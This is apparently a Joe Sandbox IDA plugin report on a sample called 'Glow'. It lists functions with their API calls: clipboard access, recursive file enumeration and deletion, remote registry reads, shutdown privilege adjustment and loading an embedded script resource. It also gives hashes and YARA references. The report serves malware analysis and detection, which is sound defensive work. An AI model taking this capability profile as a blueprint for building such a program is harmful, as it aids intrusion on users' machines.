HeapFree.KERNEL32(00000000), ref: 003E16A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E16B1
HeapFree.KERNEL32(00000000), ref: 003E16B8
GetProcessHeap.KERNEL32(00000000,?), ref: 003E16C4
HeapFree.KERNEL32(00000000), ref: 003E16CB

Part of subcall function 003E1ADF: GetProcessHeap.KERNEL32(00000008,003E14FD,?,00000000,?,003E14FD,?), ref: 003E1AED
Part of subcall function 003E1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,003E14FD,?), ref: 003E1AF4
Part of subcall function 003E1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,003E14FD,?), ref: 003E1B03

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 782b48583cae10e55dfdd5274a6b4891634707b33516fa950d65e42f207c540a
Instruction ID: 86e987bb61d3fd68f40dcb97dcc64cbae99ea770873f133da909c29db6581f5a
Opcode Fuzzy Hash: 782b48583cae10e55dfdd5274a6b4891634707b33516fa950d65e42f207c540a
Instruction Fuzzy Hash: 39715DB2900259ABDF11DFA6DC44FEEBBB8BF08340F098625E915A7190D7719A05CBA4

Function 003FF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0041DCD0), ref: 003FF586
IsClipboardFormatAvailable.USER32(0000000D), ref: 003FF594
GetClipboardData.USER32(0000000D), ref: 003FF5A0
CloseClipboard.USER32 ref: 003FF5AC
GlobalLock.KERNEL32(00000000), ref: 003FF5E4
CloseClipboard.USER32 ref: 003FF5EE
GlobalUnlock.KERNEL32(00000000), ref: 003FF619
IsClipboardFormatAvailable.USER32(00000001), ref: 003FF626
GetClipboardData.USER32(00000001), ref: 003FF62E
GlobalLock.KERNEL32(00000000), ref: 003FF63F
GlobalUnlock.KERNEL32(00000000), ref: 003FF67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 003FF695
GetClipboardData.USER32(0000000F), ref: 003FF6A1
GlobalLock.KERNEL32(00000000), ref: 003FF6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 003FF6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003FF6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003FF72F
GlobalUnlock.KERNEL32(00000000), ref: 003FF750
CountClipboardFormats.USER32 ref: 003FF771
CloseClipboard.USER32 ref: 003FF7B6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: b7652b90de0350ae765bd07d7afd5d55846e3ad72598631cb4fece1b13127d20
Instruction ID: 9c76266003afab949e0b5d0f22110cd9d7522c61e25656f1e33c0fb63f97ac70
Opcode Fuzzy Hash: b7652b90de0350ae765bd07d7afd5d55846e3ad72598631cb4fece1b13127d20
Instruction Fuzzy Hash: 9D61F2712043059FD302FF20D884F7AB7A4AF44744F1485ADF94A8B2A2DB31DD49CB62

Function 003F73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 003F7403
FindClose.KERNEL32(00000000), ref: 003F7457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003F7493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003F74BA

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 003F74F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 003F7524

Strings

%02d, xrefs: 003F7645, 003F764F, 003F769F, 003F76EF, 003F773F, 003F778F
%4d, xrefs: 003F75F6
%4d%02d%02d%02d%02d%02d, xrefs: 003F75AF
%03d, xrefs: 003F77E7
%4d%02d%02d%02d%02d%02d%03d, xrefs: 003F7577

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: c69653317a55cf67b3dd546683df704157cc35779a5527ef378c3511b682ab57
Instruction ID: 3dedfb4fc1295d5d0367341de8cbc94523789e0dfb07b2ccd6bb9fa33fda3b2e
Opcode Fuzzy Hash: c69653317a55cf67b3dd546683df704157cc35779a5527ef378c3511b682ab57
Instruction Fuzzy Hash: F3D16072908344AEC315EF64C881EBBB7ECAF88704F44495DF589DB192EB74DA48C762

Function 003FA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003FA0A8
GetFileAttributesW.KERNEL32(?), ref: 003FA0E6
SetFileAttributesW.KERNEL32(?,?), ref: 003FA100
FindNextFileW.KERNEL32(00000000,?), ref: 003FA118
FindClose.KERNEL32(00000000), ref: 003FA123
FindFirstFileW.KERNEL32(*.*,?), ref: 003FA13F
SetCurrentDirectoryW.KERNEL32(?), ref: 003FA18F
SetCurrentDirectoryW.KERNEL32(00447B94), ref: 003FA1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 003FA1B7
FindClose.KERNEL32(00000000), ref: 003FA1C4
FindClose.KERNEL32(00000000), ref: 003FA1D4

Strings

*.*, xrefs: 003FA13A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 9b3d57521bbcd2c157d211880121a2273cdb4bbe79367c4609b0feb43caaae91
Instruction ID: 081fe5b3cfb49981aad6ed6654f9ef5f17f60bf492e09a1352937941ebf708d6
Opcode Fuzzy Hash: 9b3d57521bbcd2c157d211880121a2273cdb4bbe79367c4609b0feb43caaae91
Instruction Fuzzy Hash: 203129B1A0061D6FDB11AFB4DC4AAEE77ACDF05320F1140A1FA19D3090EB74DE45CA69

Function 003F4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003F4785
_wcslen.LIBCMT ref: 003F47B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 003F47E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003F4803
RemoveDirectoryW.KERNEL32(?), ref: 003F4813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003F489A
CloseHandle.KERNEL32(00000000), ref: 003F48A5
CloseHandle.KERNEL32(00000000), ref: 003F48B0

Strings

\, xrefs: 003F47BC
\??\%s, xrefs: 003F47A0
:, xrefs: 003F47C7

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 1ef108c45f54be067150ec719a8d077d3760f0c11d60df007149ce2a88831300
Instruction ID: 7674368ece53eaa3901c75d36f17cb46ec543d8c988085836040899d2cbf66eb
Opcode Fuzzy Hash: 1ef108c45f54be067150ec719a8d077d3760f0c11d60df007149ce2a88831300
Instruction Fuzzy Hash: 8F31C2B190024DABDB229FA0DC49FEB37BCEF89740F1081B6F619D6060EB7497448B24

Function 003FA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003FA203
FindNextFileW.KERNEL32(00000000,?), ref: 003FA25E
FindClose.KERNEL32(00000000), ref: 003FA269
FindFirstFileW.KERNEL32(*.*,?), ref: 003FA285
SetCurrentDirectoryW.KERNEL32(?), ref: 003FA2D5
SetCurrentDirectoryW.KERNEL32(00447B94), ref: 003FA2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 003FA2FD
FindClose.KERNEL32(00000000), ref: 003FA30A
FindClose.KERNEL32(00000000), ref: 003FA31A

Part of subcall function 003EE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003EE3B4

Strings

*.*, xrefs: 003FA280

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 7960475b819f47e545563443dae0a5d15758421a8144abc99cddf334ade3acc3
Instruction ID: d2ec804507ecb68c94c5f683d3eed0da36699cacf141ad6e378f97b4ea350eb5
Opcode Fuzzy Hash: 7960475b819f47e545563443dae0a5d15758421a8144abc99cddf334ade3acc3
Instruction Fuzzy Hash: 223179B1A00A1D7ECF12AFA0DC08EEE37ACDF05324F1140A2FA18A3090D735DE85CA59

Function 0040C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040C10E,?,?), ref: 0040D415
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D451
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4C8
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0040CA09
RegCloseKey.ADVAPI32(00000000), ref: 0040CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0040CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0040CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0040CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0040CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0040CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040CDE2
RegCloseKey.ADVAPI32(00000000), ref: 0040CDEF

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 6d7331e3c59ce7bf626a093f8c80e7bdd8c5fd79acad50fe870411b3c7e01da5
Instruction ID: ee566a83dd37ba460d1d1f1b52209ca94150b0a4965a2d4fff91d3f5ec131594
Opcode Fuzzy Hash: 6d7331e3c59ce7bf626a093f8c80e7bdd8c5fd79acad50fe870411b3c7e01da5
Instruction Fuzzy Hash: 3B024B70604200EFD715DF24C8D1A2ABBE5EF48308F1885ADE84ADB2A2DB35EC46CB55

Function 003ED921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00385851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003855D1,?,?,003C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00385871

Part of subcall function 003EEAB0: GetFileAttributesW.KERNEL32(?,003ED840), ref: 003EEAB1

FindFirstFileW.KERNEL32(?,?), ref: 003ED9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 003EDA88
MoveFileW.KERNEL32(?,?), ref: 003EDA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 003EDAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 003EDAE2

Part of subcall function 003EDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,003EDAC7,?,?), ref: 003EDB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 003EDAFE
FindClose.KERNEL32(00000000), ref: 003EDB0F

Strings

\*.*, xrefs: 003ED978, 003ED981, 003ED996

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 0a86cb0de096e89498c3982ab11737de42785b302cf1f7ab61ab6efeedf37404
Instruction ID: ef508acfd767ad259016a063a03360e455f56c20b7635e51e0cb19cd3b22712f
Opcode Fuzzy Hash: 0a86cb0de096e89498c3982ab11737de42785b302cf1f7ab61ab6efeedf37404
Instruction Fuzzy Hash: C6613E3180529EAFCF06FFA1D9529EDB7B5AF14304F2081A5E4027B192EB315F09CB50

Function 003FF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 003FF7EE
EmptyClipboard.USER32 ref: 003FF7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 003FF809
CloseClipboard.USER32 ref: 003FF900

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2e42c38e20498c81d0251b68683d09a8be6a04fd1bb7ea6e404a992be0236b62
Instruction ID: f7acc5e5beeb579b9c0b2a9df715f54b8e5258971bbe7f8fe9b042945cc1b82a
Opcode Fuzzy Hash: 2e42c38e20498c81d0251b68683d09a8be6a04fd1bb7ea6e404a992be0236b62
Instruction Fuzzy Hash: D841BD71A04611AFD311DF24D888B65BBE4EF44358F15C0A9E82A8F662C775EC41CB90

Function 003EF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 003E2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E205A
Part of subcall function 003E2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E2087
Part of subcall function 003E2010: GetLastError.KERNEL32 ref: 003E2097

ExitWindowsEx.USER32(?,00000000), ref: 003EF249

Strings

SeShutdownPrivilege, xrefs: 003EF219
, xrefs: 003EF273
@, xrefs: 003EF23C
, xrefs: 003EF237

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 8e45e057f937d7f46644c776fa4bad955779a509c35fa815a7170f0262b7d499
Instruction ID: 8216534aa2a2f617f8b96ad437002a845bf3ac19fe643012c3ac962432e11b78
Opcode Fuzzy Hash: 8e45e057f937d7f46644c776fa4bad955779a509c35fa815a7170f0262b7d499
Instruction Fuzzy Hash: FB01D6BEA112B06FEB1566B99C8ABFB736C9B08344F154E31FE12E61D1D7A05D009194

Function 003822AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 0038233E
GetSysColor.USER32(0000000F), ref: 00382421
SetBkColor.GDI32(?,00000000), ref: 00382434

Strings

(E, xrefs: 0038240A

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Color$Proc
String ID: (E
API String ID: 929743424-3218771753
Opcode ID: 847cae03b3ccfb52fea6158d0d41a301d51903d593147c000050cb268d38356c
Instruction ID: 377e4c37221321cc8f51e9e36f425bff651c4bce38febdac71497fdf0ad6c28e
Opcode Fuzzy Hash: 847cae03b3ccfb52fea6158d0d41a301d51903d593147c000050cb268d38356c
Instruction Fuzzy Hash: 488129F4104700BEE22B76398CA8FBF255EEB46304B16419EF102D6996C99DDF42937A

Function 003F3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003C56C2,?,?,00000000,00000000), ref: 003F3A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003C56C2,?,?,00000000,00000000), ref: 003F3A35
LoadResource.KERNEL32(?,00000000,?,?,003C56C2,?,?,00000000,00000000,?,?,?,?,?,?,003866CE), ref: 003F3A45
SizeofResource.KERNEL32(?,00000000,?,?,003C56C2,?,?,00000000,00000000,?,?,?,?,?,?,003866CE), ref: 003F3A56
LockResource.KERNEL32(003C56C2,?,?,003C56C2,?,?,00000000,00000000,?,?,?,?,?,?,003866CE,?), ref: 003F3A65

Strings

SCRIPT, xrefs: 003F3A2B

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: d5ceb219bb59e523181a1667e2c9cfdfe27233626f1ff284eb03dafebef4368f
Instruction ID: a22c7b31a4695c368bc625068b901d9ca698c25ebe84001e3504c1114a66ef08
Opcode Fuzzy Hash: d5ceb219bb59e523181a1667e2c9cfdfe27233626f1ff284eb03dafebef4368f
Instruction Fuzzy Hash: D9118EB0600705BFEB218F66DD48F677BB9EBC5B40F14866CB522D6250DB71DD008631

Function 003E20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003E1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E1916
Part of subcall function 003E1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E1922
Part of subcall function 003E1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E1931
Part of subcall function 003E1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E1938
Part of subcall function 003E1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E194E

GetLengthSid.ADVAPI32(?,00000000,003E1C81), ref: 003E20FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 003E2107
HeapAlloc.KERNEL32(00000000), ref: 003E210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 003E2127
GetProcessHeap.KERNEL32(00000000,00000000,003E1C81), ref: 003E213B
HeapFree.KERNEL32(00000000), ref: 003E2142

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f56112a02a8fe33e8fa0fc2f9a1fbc5471c94f14a59bf6fab4357d82b8d04295
Instruction ID: 2a30059e43aecb1d5f68c860af5516f5f10af57b96ca4d07dfa82199136a70a2
Opcode Fuzzy Hash: f56112a02a8fe33e8fa0fc2f9a1fbc5471c94f14a59bf6fab4357d82b8d04295
Instruction Fuzzy Hash: B011ACB1900214FFDB119B65CC09FAF7BADEF45355F158128E941971A0C735AA40CB64

Function 003FA570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003FA5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003FA6D0

Part of subcall function 003F42B9: GetInputState.USER32 ref: 003F4310
Part of subcall function 003F42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003F43AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003FA5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003FA6BA

Strings

*.*, xrefs: 003FA5A2

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: a2b0e8ac97b59c399690ff7994ba47935543fa92e05b8731886c0ed6340245c9
Instruction ID: 48a93141978f598db26cc561449ddafea2ab2aeed48601d3e7b3b65eda44d2e2
Opcode Fuzzy Hash: a2b0e8ac97b59c399690ff7994ba47935543fa92e05b8731886c0ed6340245c9
